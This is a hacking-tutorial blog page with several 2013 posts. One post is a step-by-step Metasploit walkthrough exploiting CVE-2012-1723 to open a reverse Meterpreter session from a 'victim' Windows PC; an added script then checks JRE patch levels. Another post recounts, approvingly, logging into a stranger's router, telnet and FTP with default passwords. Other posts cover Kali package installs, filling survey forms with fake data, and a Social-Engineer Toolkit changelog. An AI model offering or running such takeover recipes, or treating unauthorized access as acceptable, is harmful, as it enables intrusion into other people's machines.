Showing posts with label Tutorial.

Sunday, 12 May 2013

Hacking a Remote PC by Exploiting Java Applet Field Bytecode Verifier Cache Remote Code Execution

CVE-2012-1723: A vulnerability in the HotSpot bytecode verifier where an invalid optimization of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficient type checking. A specially-crafted class file could possibly use this flaw to bypass Java sandbox restrictions, and load additional classes in order to perform malicious operations. The vulnerability was made public by Michael ‘mihi’ Schierl.

Requirements:

Attacker machine: Backtrack
Victim machine: Windows with an unpatched JRE installed

Step 1: Launch the Metasploit console
Open a terminal on the attacker machine (Backtrack).
Type "msfupdate"; this updates Metasploit with the latest modules.
Now type "msfconsole" to start interacting with the Metasploit framework.

Step 2:
Type "use exploit/multi/browser/java_verifier_field_access" and then run the following commands:

msf exploit(java_verifier_field_access) > set PAYLOAD java/meterpreter/reverse_http
msf exploit(java_verifier_field_access) > set LHOST [Backtrack IP ADDRESS]
msf exploit(java_verifier_field_access) > exploit

If you don't know what I am talking about, please read my previous tutorial.

Step 3:
If you followed the above commands correctly, you will get the following result.

Copy the URL and open it in the victim machine. Once the URL loads in the victim machine, it launches the exploit and creates a new session.

Now type "sessions"; this lists the active sessions.

Type "sessions -i 1"; this opens the connection to the session with id '1' and brings you to Meterpreter, which lets you interact with and control the target.

References:

POC: http://schierlm.users.sourceforge.net/CVE-2012-1723.html
Metasploit Module: http://www.exploit-db.com/exploits/19717/
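As an added defensive check, not part of the original post: the module above only works against a JRE that predates the vendor fix, so an administrator's first question is which release is installed. The POSIX shell function below parses a `java -version` string and reports whether that release still needs the CVE-2012-1723 patch; the fix levels it uses (Java 7 Update 5 and Java 6 Update 33) are assumed from Oracle's June 2012 advisory and are not stated on this page.

```shell
# Added defensive check, not from the original post. Fix levels are an assumption taken
# from Oracle's June 2012 Critical Patch Update: JDK 7 Update 5 and JDK 6 Update 33.
FIX_JAVA7=5
FIX_JAVA6=33

# java_major_number VERSION -> prints the major release (7 for "1.7.0_04", 11 for "11.0.2")
java_major_number() {
    case "$1" in
        1.*) printf '%s\n' "$1" | cut -d. -f2 ;;   # legacy "1.X.0_NN" scheme
        *)   printf '%s\n' "$1" | cut -d. -f1 ;;   # modern "9.0.1"-style scheme
    esac
}

# java_update_number VERSION -> prints the update number of "1.X.0_NN" (0 if absent);
# the leading zero of "_04" is stripped so the value is safe for integer comparison.
java_update_number() {
    upd=$(printf '%s\n' "$1" | sed -n 's/^[0-9]*\.[0-9]*\.[0-9]*_\([0-9]*\).*/\1/p' | sed 's/^0*//')
    printf '%s\n' "${upd:-0}"
}

# java_needs_cve_2012_1723_patch VERSION
# Returns 0 (true) when the release predates the fix and should be treated as vulnerable.
java_needs_cve_2012_1723_patch() {
    major=$(java_major_number "$1")
    update=$(java_update_number "$1")
    case "$major" in
        7) [ "$update" -lt "$FIX_JAVA7" ] ;;
        6) [ "$update" -lt "$FIX_JAVA6" ] ;;
        [89]|[1-9][0-9]) return 1 ;;              # released after the fix
        *) return 0 ;;                            # Java 5 and older: end-of-life, treat as unpatched
    esac
}

# installed_java_version -> the version string reported by the local JRE, empty if none
installed_java_version() {
    java -version 2>&1 | sed -n 's/^java version "\([^"]*\)".*/\1/p'
}

# Report on the local machine (only meaningful where a JRE is on PATH).
ver=$(installed_java_version 2>/dev/null)
if [ -n "$ver" ]; then
    if java_needs_cve_2012_1723_patch "$ver"; then
        echo "JRE $ver predates the CVE-2012-1723 fix: update it"
    else
        echo "JRE $ver is at or beyond the fix level"
    fi
fi
```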

Saturday, 11 May 2013

How to Install Software in Kali Linux



Kali Linux is the next-generation, advanced version of Backtrack Linux: a more stable, secure and upgraded Debian-based Linux. It has been designed for penetration testers, information security professionals and students, and it contains all the tools necessary to conduct a successful penetration test on web applications, networks, VoIP and WiFi.

Besides ethical hacking tools, a Linux distribution must have the utilities and software needed for it to become a primary desktop operating system. Kali Linux is stable, it loads the required drivers automatically, and it has an Add/Remove Software utility from which you can manage your software. It already has the necessary tools installed, from a document viewer to the VLC player, but some tools required for desktop computing are not installed and you need to install and configure them yourself.

This article discusses software installation in Kali Linux. You can install as much software as you want, but I will discuss the installation of a few important programs, for example:

Skype (for communication)
Open Office
Flash

When Backtrack 5 was launched we discussed the installation of important software on it, but times have changed and we now have Kali Linux, so we will discuss the installation on it.

How to Install Skype in Kali Linux
The first step is to get Skype from its official website; make sure to select your distribution carefully. For Kali choose Ubuntu 10.04 and download it.

After downloading, open a terminal, change to the download directory, and install the package with the dpkg -i command:
Root@ehacking:~/Downloads# sudo dpkg -i skype-ubuntu-lucid_4.1.0.20-1_i386_001.deb
How to Install Open Office in Kali Linux

Open Office is a good alternative to MS Office. The easiest way to install it is from the terminal with the command "apt-get install openoffice.org", but one of our users reported a problem with the repositories in Kali Linux. We have also seen that the Debian repositories are not working properly, so you cannot install packages from the terminal. The solution is as follows:

The apt repositories need some changes; follow the steps below:
root@ehacking:~# cd ..
root@ehacking:/# ls
bin   etc         lib         mnt   root  selinux  tmp  vmlinuz
boot  home        lost+found  opt   run   srv      usr
dev   initrd.img  media       proc  sbin  sys      var
root@ehacking:/# cd etc/apt
root@ehacking:/etc/apt# nano sources.list 

Important: Do not delete the lines that are already present in the sources file; just add the following repositories to it:
deb [arch=i386,amd64,armel,armhf] http://http.kali.org/kali kali-dev main contrib non-free
deb [arch=i386,amd64,armel,armhf] http://http.kali.org/kali kali-dev main/debian-installer
deb http://http.kali.org/kali kali main contrib non-free
deb-src http://http.kali.org/kali kali main contrib non-free
deb-src http://security.kali.org/kali-security kali/updates main contrib non-free
Press Ctrl+O, then Enter, then Ctrl+X to exit; you are almost done. The next step is to update your package lists: in the terminal type apt-get update
Now it is very easy to install software from the terminal. For Office, type:
# apt-get install openoffice.org
How to Install Flash in Kali Linux

# apt-get install flashplugin-nonfree
Now your Kali is ready to install as much software as you want.




Monday, 6 May 2013

How I Hacked A Remote Computer By Just IP Address

Hacking a remote computer is always a hot topic among hackers and crackers; a newbie hacker or someone who wants to learn hacking always asks how to hack into a computer by just knowing the IP address. Although we have discussed so many methods before, I always insist on learning some basic commands, protocols and their usage. This is my story of how I hacked into a remote computer by just using the IP address (I have not downloaded any file, and I have not even cleared the logs). This story was not planned, it just happened, and I am sure you will like it and you will learn a lot if you don't know the basic commands and protocols.

It was Saturday night and I was working hard on a Social Engineering Toolkit remote attack (WAN/Internet attack), which is why I was playing with my router for port forwarding and other stuff; remember, my ISP uses a dynamic IP mechanism, so I had set up a DNS server to get a static IP. It was almost night and I decided to get some sleep, so I saved my browser tabs so that I could use them next time.

On Sunday evening I opened my browser, the previous tabs opened automatically, and then I got a pop-up window asking for the user name and password of my router. I looked at the address bar: the IP address was the same one I had saved. I was shocked that my ISP had not changed my WAN IP (remember, the ISP uses dynamic IPs). After this I opened a whatismyip website and saw that my IP was different, which means the window asking for a user name and password belonged to the IP of another computer.

I just got an idea: why not brute-force it and get access to the victim router? Hydra has been discussed before, but before brute forcing I decided to try guessing. I entered so many combinations but failed; then I just used the default user name and password and, hurrah, I was in.

Security was very low. Then I did a quick nmap scan to get the open ports (remember, I had turned off the firewall of the victim router). According to the nmap result FTP and telnet were open, and then I realized how vulnerable this victim was.
I went to my terminal and opened telnet to the victim using the default password, and I was in. Now I was able to take control of this computer, but this was not part of the plan.
FTP (file transfer protocol): I went to my terminal again and this time used the FTP command with the same combination of user name and password, and it succeeded. Remember, FTP access means you can download and upload files on the remote computer, which means full access. You can use a GUI FTP client, but I used the command line.
Countermeasures
Always use a strong password
Turn on your firewall (both on the router and the computer)


BYPASS SURVEYS

BYPASS THE "SURVEYS" WITHOUT DISCLOSING YOUR PERSONAL INFORMATION!

We often come across sites on which we are forced to complete a survey because we want to download a file or see some content.
In all of these surveys we are forced to disclose personal information like our phone number, email id, etc.
Later these sites irritate you with SMS and spam mails of offers in which you are not at all interested!
So I've found a way to get through these sites without leaking your personal information!
Let's start:
1. Download the add-on called "Greasemonkey" for Mozilla Firefox (Firefox is needed).
https://addons.mozilla.org/en-US/firefox/addon/greasemonkey/
After installing it, it will appear like this in your browser:
2. After installing it, download this script, which runs with the help of the add-on (Greasemonkey):
http://userscripts.org/scripts/show/2560
Install this script and make sure the monkey on the right side of your Firefox window is colored (which means Greasemonkey is activated; to activate or deactivate it, just click on it).
3. Now go to the site that tells you to do the survey and asks for your information, etc.
4. You'll see an option at the top left of the page that says "Press CTRL+SHIFT+F to fill in form."

5. Do as directed: press CTRL+SHIFT+F and you will see that the form gets filled in on its own, and all the information filled in is completely random!
Click on submit and you are registered on the site, and now you can easily download what you wanted! :)
BUT
6. Some sites may tell you to verify your identity by logging into your mail and opening some URL or getting a PIN! For this, all you have to do is go to http://www.yopmail.com/en/ . On this site you get a temporary email id for around 15-30 minutes. Paste that temporary email id in place of the email id which your intelligent form filler randomly filled in, then click on submit form.
Here "yoyo@yopmail.com" is the yopmail email id which replaces the default id given by the "form filler".
7. Check the http://www.yopmail.com/en/ inbox for the mail from the site, get the PIN or confirmation link, and you are done! :-)

Here, as you can see, are two mails from the site where we had to forcefully register, with the confirmation link plus password (the other mails are just spam; ignore them).

8. Some sites may ask you for voice call confirmation. I have the solution for that too :)
In that case go to http://www.k7.net/ ; on this site you can receive voice calls via mail! So you bypass the survey again without giving any details!

Register here and you'll be able to receive voice calls via mail.

Sunday, 5 May 2013

The Social-Engineer Toolkit v1.4

Social-Engineer Toolkit v1.4, latest version!

The Social Engineering Toolkit (SET) is a python-driven suite of custom tools which solely focuses on attacking the human element of penetration testing. Its main purpose is to augment and simulate social-engineering attacks and allow the tester to effectively test how a targeted attack may succeed.
Official change log:
Java changed how self signed certificates work. It shows a big UNKNOWN now, modified self sign a bit.
Added the ability to purchase a code signing certificate and sign it automatically. You can either import or create a request.
Fixed a bug in the wifi attack vector where it would not recognize /usr/local/sbin/dnsspoof as a valid path
Fixed a bug in the new backtrack5 to recognize airmon-ng
Added the ability to import your own code signed certificate without having to generate it through SET
Fixed an issue where the web templates would load two java applets by mistake, it now is correct and only loads one
Fixed a bounds exception issue when using the SET interactive shell, it was using pexpect.spawn and was changed to subprocess.Popen instead
Added better import detection and error handling around the python module readline. Older versions of python may not have it; if it detects that python-readline is not installed it will disable tab completion
Added a new menu to the main SET interface that is the new verified codesigning certificate menu
Fixed a bug with the SET interactive shell that if you selected a number that was out of the range of shells listed, it would hang. It now throws a proper exception if an invalid number or non-numeric instance is given for input
Added more documentation around the core modules in the SET User_Manual
Updated the SET_User manual to reflect version 1.4
Download The Social-Engineer Toolkit v1.4 Here